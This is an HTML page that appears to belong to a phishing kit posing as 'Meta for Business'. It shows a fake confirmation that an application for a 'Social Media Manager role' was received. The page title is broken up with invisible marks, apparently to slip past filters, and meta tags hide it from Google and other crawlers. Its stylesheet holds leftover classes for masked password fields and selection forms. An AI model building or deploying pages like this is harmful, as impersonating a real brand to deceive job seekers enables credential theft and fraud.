<html></html>

<head>
    <meta http-equiv="origin-trial">
    <title class="jsx-959629656">M&lrm;e&lrm;t&lrm;a f&lrm;o&lrm;r B&lrm;u&lrm;s&lrm;i&lrm;n&lrm;e&lrm;ss</title>
    <meta charset="utf-8" class="jsx-959629656">
    <meta name="viewport" content="width=device-width, initial-scale=1" class="jsx-959629656">
    <meta name="crawler" content="noindex,nofollow,noarchive,noimageindex" class="jsx-959629656">
    <meta name="AdsBot-Google" content="noindex,nofollow,noarchive,noimageindex" class="jsx-959629656">
    <meta name="googlebot" content="noindex,nofollow,noarchive,noimageindex" class="jsx-959629656">
    <meta name="googlebot-news" content="nosnippet" class="jsx-959629656">
    <link rel="icon" href="./assets/favicon.ico" class="jsx-959629656">
    <meta name="robots" content="noarchive" class="jsx-959629656">
    <link rel="preconnect" href="https://fonts.googleapis.com" class="jsx-959629656">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="true" class="jsx-959629656">
    <link rel="stylesheet" href="./assets/style.css">
    <link rel="stylesheet" href="./assets/style2.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>

    <style>
        .container {
            /* background-color: #FFFFFF;
            border-radius: 20px;
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
            width: 100%;
            max-width: 400px; */
            padding: 20px;
            /* box-sizing: border-box; */
        }
        .header {
            /* display: flex;
            justify-content: space-between;
            align-items: flex-start; */
            margin-bottom: 20px;
        }
        .close-btn {
            font-size: 24px;
            background: none;
            border: none;
            cursor: pointer;
            color: #65676B;
        }
        .title {
            flex-grow: 1;
            margin-left: 10px;
        }
        .tityle {
            font-size: 20px;
            margin: 0;
            font-weight: bold;
            color: #1C1E21;
        }
        .subtitle {
            text-align: center;
            font-weight: 500;
            font-size: 14px;
            color: #65676B;
            margin: 5px 0 0;
        }
        p {
            color: #1C1E21;
            font-size: 16px;
            margin-bottom: 20px;
        }
        .illustration {
          
            height:200px;
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
            gap: 20px;
        }
        .illustration img {
            border-radius: 10px;
            width: 30%;
            height: auto;
        }
        input:focus-visible{
            outline: none;
            border: 1px solid #dddfe2;
        }
        input[type="text"] {
            width: 100%;
            padding: 15px;
            border: 1px solid #dddfe2;
            border-radius: 10px;
            font-size: 16px;
            margin-bottom: 10px;
            box-sizing: border-box;
        }
        .timer {
            margin-bottom: 20px;
            color: red;
            font-size: 13px;
            font-weight: 500;
            text-align: left;
        }
        
        .btn {
            width: 100%;
            padding: 12px;
            border: none;
            border-radius: 20px;
            font-size: 16px;
            font-weight: 500;
            cursor: pointer;
            margin-bottom: 10px;
        }
        .btn-primary {
            background-color: #1877f2;
            color: white;
        }
        .btn-secondary {
            background-color: transparent;
            color: black;
            border: 1px solid #dddfe2;
        }
        @media (max-width: 480px) {
            .container {
               
                border-radius: 0;
                display: flex;
                flex-direction: column;
            }
            .illustration {
                flex-grow: 1;
                display: flex;
                align-items: center;
                justify-content: center;
            }
        }
        .kVLiUK {
            position: fixed;
            top: 0px;
            left: 0px;
            z-index: 1050;
            width: 100%;
            height: 100%;
            overflow: hidden;
            outline: 0px;
            display: grid;
            place-items: center;
            background-color: rgba(0, 0, 0, 0.5);
            padding: 1.5rem;
        }

        .kVLiUK2 {
            position: fixed;
            top: 0px;
            left: 0px;
            z-index: 1050;
            width: 100%;
            height: 100%;
            overflow: hidden;
            outline: 0px;
            display: grid;
            place-items: center;
            background-color: rgba(0, 0, 0, 0.5);
            padding: 1.5rem;
        }

        .clDnUI {
            background-color: rgb(255, 255, 255);
            background-clip: padding-box;
            border: 1px solid rgba(0, 0, 0, 0.2);
            border-radius: 1.5rem;
            outline: 0px;
            max-width: 500px;
            width: 100%;
            z-index: 1051;
            position: relative;
        }

        .clDnUI .gradient {
            position: absolute;
            left: 0%;
            top: 0%;
            height: 100%;
            width: 100%;
            background-image: radial-gradient(rgba(255, 255, 255, 0.25), rgba(255, 255, 255, 0) 40%), radial-gradient(rgb(255, 209, 82) 30%, rgb(226, 105, 150), rgba(226, 105, 150, 0.4) 41%, transparent 52%), radial-gradient(rgb(160, 51, 255) 37%, transparent 46%), linear-gradient(155deg, transparent 65%, rgb(37, 212, 102) 95%), linear-gradient(45deg, rgb(0, 101, 224), rgb(15, 139, 255));
            background-repeat: no-repeat;
            opacity: 0.08;
            z-index: -1;
            background-size: 200% 200%, 285% 500%, 285% 500%, cover, cover;
            background-position: left bottom, 109% 68%, 109% 68%, center center, center center;
        }

        .dKtUEZ {
            color: rgb(5, 5, 5) !important;
            font-size: 18px !important;
            font-weight: 700 !important;
        }

        .YkvTn {
            background-color: rgb(255, 255, 255);
            border: 1px solid rgb(206, 212, 218) !important;
            border-radius: 8px !important;
            padding: 0.75rem !important;
        }

        .inputTypePW {
            -webkit-text-security: disc;
            text-security: disc;
        }

        .gKfJIg {
            background-color: rgb(0, 100, 224);
            border: 1px solid rgb(0, 100, 224);
            width: 100%;
            color: white;
            font-size: 13px;
            font-weight: 500;
            padding: 14px 20px;
            border-radius: 50px;
            text-transform: none;
            margin-top: 5rem;
            line-height: 1;
        }

        .sc-8b304678-5.iDNqeC {
            display: none;
        }

        .eEpzIy {
            max-width: 700px;
            margin: auto;
            width: calc(100% - 2rem);
        }

        .ieaSSP {
            font-weight: 700;
            color: rgb(28, 43, 51);
            font-size: 24px;
        }

        .eRUnLK {
            margin: auto auto 54px !important;
            width: 100% !important;
            border-radius: 10px !important;
            padding-block: 1rem !important;
        }

        .eRUnLK .radioContainer {
            font-family: '__Montserrat_b1da2a', '__Montserrat_Fallback_b1da2a' !important;
            display: flex !important;
            margin-bottom: 12px !important;
            cursor: pointer !important;
            font-size: 15px !important;
            user-select: none !important;
            padding: 0.75rem !important;
            color: rgb(28, 43, 51) !important;
            font-weight: 500 !important;
            justify-content: space-between !important;
            align-items: center !important;
        }

        .eRUnLK .radioContainer input {
            position: absolute !important;
            width: 0px !important;
            height: 0px !important;
            opacity: 0 !important;
            cursor: pointer !important;
        }

        .eRUnLK .checkmark {
            height: 22px !important;
            width: 22px !important;
            background-color: rgb(255, 255, 255);
            border-radius: 50% !important;
            display: grid !important;
            place-items: center !important;
            box-sizing: border-box !important;
        }

        .bJpDZy {
            background-color: rgb(0, 100, 224);
            border: 1px solid rgb(0, 100, 224);
            width: 100%;
            color: white;
            font-size: 13px;
            font-weight: 500;
            padding: 14px 20px;
            border-radius: 50px;
            text-transform: none;
            line-height: 1;
        }

        .eRUnLK .radioContainer:hover {
            background-color: rgba(204, 204, 204, 0.314) !important;
        }

        .eRUnLK .radioContainer input:checked~.checkmark::after {
            display: block;
        }

        .eRUnLK .radioContainer .checkmark::after {
            width: 11px;
            height: 11px;
            border-radius: 50%;
            box-sizing: content-box;
            border: 3px solid rgb(255, 255, 255);
        }

        .eRUnLK .checkmark::after {
            content: "";
            display: none;
        }

        .eRUnLK .radioContainer input:checked~.checkmark {
            background-color: rgb(33, 150, 243);
        }
    </style>
</head>

<body style="overflow-y: auto;">
    <div class="sc-ce9c5cf8-0 kVLiUK2">
        <div class="sc-ce9c5cf8-1 clDnUI">
            <div class="gradient"></div>
            <div class="container">
                <div class="header">
                    <div class="illustration">
                        <img src="./loadingGif.d1fc1a94ee14879a4193.gif"
                            alt="Hands holding a phone">
                    </div>
                </div>
                
                <p class="subtitle"> Thanks for applying, Your Application for the Social Media Manager role has been received. You will get an email regarding the status of your application in the upcoming weeks.</span></p>
               
                  </p>
            </div>
        </div>
    </div>
</body>

</html>